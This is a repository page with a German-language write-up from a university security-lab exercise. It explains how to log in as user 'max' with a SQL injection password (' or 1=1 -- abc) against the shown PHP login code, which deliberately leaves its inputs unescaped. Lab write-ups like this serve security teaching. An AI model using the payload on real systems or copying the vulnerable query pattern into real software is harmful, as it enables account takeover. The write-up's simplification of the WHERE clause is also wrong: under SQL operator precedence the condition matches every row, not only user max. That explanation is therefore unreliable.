Oshgnacknak/css2021-seclab-writeup
Archived
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
This repository has been archived on 2025-03-12. You can view files and clone it, but cannot push or open issues or pull requests.
css2021-seclab-writeup/sql-injection
History
Oshgnacknak 10255f134e
Add SQL Injection write up
2022-01-30 19:43:58 +01:00
..
dummy-login-code.php Add SQL Injection write up 2022-01-30 19:43:58 +01:00
README.md Add SQL Injection write up 2022-01-30 19:43:58 +01:00
sql-injection.png Add SQL Injection write up 2022-01-30 19:43:58 +01:00

README.md

SQL Injection

Gegeben ist eine Login-Form. Ziel ist es, sich als Nutzer max anzumelden. Sein Passwort kennen wir nicht.

Lösung

Wir geben folgenden Daten ein:

  • Benuzername: max
  • Passwort: ' or 1=1 -- abc

Auf dem Server wird das dann etwa so ausgeführt:

<?php
function checkLogin() {
    $user = $_POST['user']; // ESCAPE FEHLT!!!!
    $password = $_POST['password']; // ESCAPE FEHLT!!!!

    $query = "SELECT * FROM users"
           . " WHERE user = '$user'"
           . " AND password='$password'"; // Siehe Hint
    return doesQueryReturnAnyRow($query);
}

if (checkLogin()) {
    echo "Information: Task solved!";
}

Mit unsere Eingabe kann man sich die Evaluierung des WHERE-Teils der Anfrage in der Datenbank in etwa so Vorstellen:

WHERE user = '$user' AND password='$password'
<=> WHERE user = 'max' AND password='' or 1=1 -- abc'
<=> WHERE user = 'max' AND 1=1 -- abc'
<=> WHERE user = 'max' -- abc'
<=> WHERE user = 'max'

Also Login wir mit max ein, ohne sein Passwort zu kennen.